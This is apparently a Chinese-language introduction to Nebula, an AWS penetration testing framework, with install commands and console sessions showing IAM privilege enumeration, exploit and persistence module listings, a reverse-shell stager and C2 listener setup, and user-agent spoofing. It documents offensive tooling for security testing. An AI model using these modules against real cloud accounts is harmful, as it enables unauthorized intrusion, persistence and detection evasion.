项目介绍
Nebula是一个云和DevOps渗透测试框架,它为每个提供者和每个功能构建了模块,截至 2021年4月,它仅涵盖AWS,但目前是一个正在进行的项目,有望继续发展以测试GCP、Azure、Kubernetes、Docker或Ansible、Terraform、Chef等自动化引擎
项目涵盖
- 自定义HTTP用户代理
- S3 存储桶名称暴力破解
- IAM、EC2和S3漏洞利用
- IAM、EC2、S3和Lambda枚举
项目构建
Step 1:下载项目文件
代码语言:javascript复制git clone https://github.com/gl4ssesbo1/Nebula
docker pull gl4ssesbo1/nebula:latest
Step 2:执行项目
代码语言:javascript复制cd Nebula
docker run -v $(pwd):/app -ti gl4ssesbo1/nebula:latest main.py
工具使用
帮助信息
代码语言:javascript复制()()(AWS) >>> help
Help Command: Description:
------------- ------------
help Show help for all the commands
help credentials Show help for credentials
help module Show help for modules
help workspace Show help for credentials
help user-agent Show help for credentials
help shell Show help for shell connections
Module Commands Description
--------------- -----------
show modules List all the modules
show enum List all Enumeration modules
show exploit List all Exploit modules
show persistence List all Persistence modules
show privesc List all Privilege Escalation modules
show reconnaissance List all Reconnaissance modules
show listener List all Reconnaissance modules
show cleanup List all Enumeration modules
show detection List all Exploit modules
show detectionbypass List all Persistence modules
show lateralmovement List all Privilege Escalation modules
show stager List all Reconnaissance modules
use module <module> Use a module.
options Show options of a module you have selected.
run Run a module you have selected. Eg: 'run <module name>'
search Search for a module via pattern. Eg: 'search s3'
back Unselect a module
set <option> Set option of a module. Need to have the module used first.
unset <option> Unset option of a module. Need to have the module used first.
User-Agent commands Description
------------------- -----------
set user-agent windows Set a windows client user agent
set user-agent linux Set a linux client user agent
set user-agent custom Set a custom client user agent
show user-agent Show the current user-agent
unset user-agent Use the user agent that boto3 produces
Workspace Commands Description
------------------ -----------
create workspace <wp> Create a workspace
use workspace <wp> Use one of the workspaces
remove workspace <wp> Remove a workspace
Shell commands Description
------------------- -----------
shell check_env Check the environment you are in, get data and meta-data
shell exit Kill a connection
shell <command> Run a command on a system. You don't need " on the command, just shell <command1> <command2>
权限查看
代码语言:javascript复制(test)()(AWS) >>> getuid
------------------------------------------------
UserId: A******************Q
------------------------------------------------
UserID: A******************Q
Arn: arn:aws:iam::012345678912:user/user_user
Account: 012345678912
[*] Output is saved to './workspaces/test/12_07_2021_02_22_54_getuid_dev_brian'
代码语言:javascript复制(test)()(AWS) >>> enum_user_privs
User: user_user
UserID: A******************Q
Arn: arn:aws:iam::012345678912:user/user_user
Account: 012345678912
--------------------------
Service: ec2
--------------------------
[*] Trying the 'Describe' functions:
[*] 'describe_account_attributes' worked!
[*] 'describe_addresses' worked!
[*] 'describe_aggregate_id_format' worked!
[*] 'describe_availability_zones' worked!
[*] 'describe_bundle_tasks' worked!
[*] 'describe_capacity_reservations' worked!
[*] 'describe_client_vpn_endpoints' worked!
[*] 'describe_coip_pools' worked!
[*] 'describe_customer_gateways' worked!
[*] 'describe_dhcp_options' worked!
[*] 'describe_egress_only_internet_gateways' worked!
^C[*] Stopping. It might take a while. Please wait.
[*] Output of the allowed functions is saved to './workspaces/test/12_07_2021_02_24_09_enum_user_privs'
[*] The list of the allowed functions is saved to './workspaces/test/12_07_2021_02_24_09_allowed_functions'
模块查询
代码语言:javascript复制()()(AWS) >>> show modules
cleanup/aws_iam_delete_access_key Delete access key of a user by providing
it.
cleanup/aws_iam_delete_login_profile Delete access of a user to the Management
Console
enum/aws_ec2_enum_elastic_ips Lists User data of an Instance provided.
Requires Secret Key and Access Key of an IAM that has access
to it.
enum/aws_ec2_enum_images List all ec2 images. Needs credentials of an
IAM with DescribeImages right. Output is dumpled on a file.
It takes a sh*tload of time, unfortunately. And boy, is it a
huge output.
enum/aws_ec2_enum_instances Describes instances attribues: Instances, VCP,
Zones, Images, Security Groups, Snapshots, Subnets, Tags,
Volumes. Requires Secret Key and Access Key of an IAM that
has access to all or any of the API calls:
DescribeAvailabilityZones, DescribeImages,
DescribeInstances, DescribeKeyPairs, DescribeSecurityGroups,
DescribeSnapshots, DescribeSubnets, DescribeTags,
DescribeVolumes, DescribeVpcs
类型列举:
代码语言:javascript复制show module
show enum
show exploit
show persistence
show privesc
show reconnaissance
show listener
show cleanup
show detection
show detectionbypass
show lateralmovement
show stager
模块检索
代码语言:javascript复制()()(AWS) >>> search instance
enum/aws_ec2_enum_instances Describes instances attribues: Instances, VCP,
Zones, Images, Security Groups, Snapshots, Subnets, Tags,
Volumes. Requires Secret Key and Access Key of an IAM that
has access to all or any of the API calls:
DescribeAvailabilityZones, DescribeImages,
DescribeInstances, DescribeKeyPairs, DescribeSecurityGroups,
DescribeSnapshots, DescribeSubnets, DescribeTags,
DescribeVolumes, DescribeVpcs
enum/aws_iam_list_instance_profiles List all the instance profiles.
exploit/aws_ec2_create_instance_with_user_data You must provide policies in JSON format in
IAM. However, for AWS CloudFormation templates formatted in
YAML, you can provide the policy in JSON or YAML format. AWS
CloudFormation always converts a YAML policy to JSON format
before submitting it to IAM.
()()(AWS) >>>
模块使用
代码语言:javascript复制(work1)()(enum/aws_ec2_enum_instances) >>> use module enum/aws_iam_get_group
(work1)()(enum/aws_ec2_enum_instances) >>>
模块细节
代码语言:javascript复制(work1)()(enum/aws_ec2_enum_instances) >>> options
Desctiption:
-----------------------------
Describes instances attribues: Instances, VCP, Zones, Images, Security Groups, Snapshots, Subnets, Tags, Volumes. Requires Secret Key and Access Key of an IAM that has access to all or any of the API calls: DescribeAvailabilityZones, DescribeImages, DescribeInstances, DescribeKeyPairs, DescribeSecurityGroups, DescribeSnapshots, DescribeSubnets, DescribeTags, DescribeVolumes, DescribeVpcs
Author:
-----------------------------
name: gl4ssesbo1
twitter: https://twitter.com/gl4ssesbo1
github: https://github.com/gl4ssesbo1
blog: https://www.pepperclipp.com/
AWSCLI Command:
-----------------------------
aws ec2 describe-instances --region {} --profile {}
Needs Credentials: True
-----------------------------
Options:
-----------------------------
SERVICE: ec2
Required: true
Description: The service that will be used to run the module. It cannot be changed.
INSTANCE-ID:
Required: false
Description: The ID of the instance you want to enumerate. If not supplied, all instances will be enumerated.
(work1)()(enum/aws_ec2_enum_instances) >>>
反弹shell
A、Stager
代码语言:javascript复制()()(AWS) >>> use module stager/aws_python_tcp
()()(stager/aws_python_tcp) >>> options
Desctiption:
-----------------------------
The TCP Reverse Shell that is used by listeners/aws_python_tcp_listener
Author:
-----------------------------
name: gl4ssesbo1
twitter: https://twitter.com/gl4ssesbo1
github: https://github.com/gl4ssesbo1
blog: https://www.pepperclipp.com/
Needs Credentials: False
-----------------------------
AWSCLI Command:
-----------------------------
None
Options:
-----------------------------
SERVICE: none
Required: true
Description: The service that will be used to run the module. It cannot be changed.
HOST:
Required: true
Description: The Host/IP of the C2 Server.
PORT:
Required: true
Description: The C2 Server Port.
FORMAT:
Required: true
Description: The format of the stager. Currently only allows 'py' for Python and 'elf' for ELF Binary.
CALLBACK-TIME: None
Required: true
Description: The time in seconds between callbacks from Stager. The Stager calls back even if the server crashes or is stoped in a loop.
OUTPUT-FILE-NAME:
Required: true
Description: The name of the stager output file.
B、Listener
代码语言:javascript复制()()(stager/aws_python_tcp) >>> use module listeners/aws_python_tcp_listener
()()(listeners/aws_python_tcp_listener) >>> options
Desctiption:
-----------------------------
TCP Listener for Reverse Shell stagers/aws_python_tcp
Author:
-----------------------------
name: gl4ssesbo1
twitter: https://twitter.com/gl4ssesbo1
github: https://github.com/gl4ssesbo1
blog: https://www.pepperclipp.com/
Needs Credentials: False
-----------------------------
AWSCLI Command:
-----------------------------
None
Options:
-----------------------------
SERVICE: none
Required: true
Description: The service that will be used to run the module. It cannot be changed.
HOST: 0.0.0.0
Required: true
Description: The Host/IP of the C2 Server.
PORT:
Required: true
Description: The C2 Server Port.
C、Agents
代码语言:javascript复制()()(AWS) >>> set user-agent linux
User Agent: Boto3/1.9.89 Python/3.8.1 Linux/4.1.2-34-generic was set
()()(AWS) >>> show user-agent
[*] User Agent is: Boto3/1.9.89 Python/3.8.1 Linux/4.1.2-34-generic
()()(AWS) >>> set user-agent windows
User Agent: Boto3/1.7.48 Python/3.9.1 Windows/7 Botocore/1.10.48 was set
()()(AWS) >>> show user-agent
[*] User Agent is: Boto3/1.7.48 Python/3.9.1 Windows/7 Botocore/1.10.48
()()(AWS) >>> set user-agent custom
Enter the User-Agent you want: sth
User Agent: sth was set
()()(AWS) >>> show user-agent
[*] User Agent is: sth
()()(AWS) >>>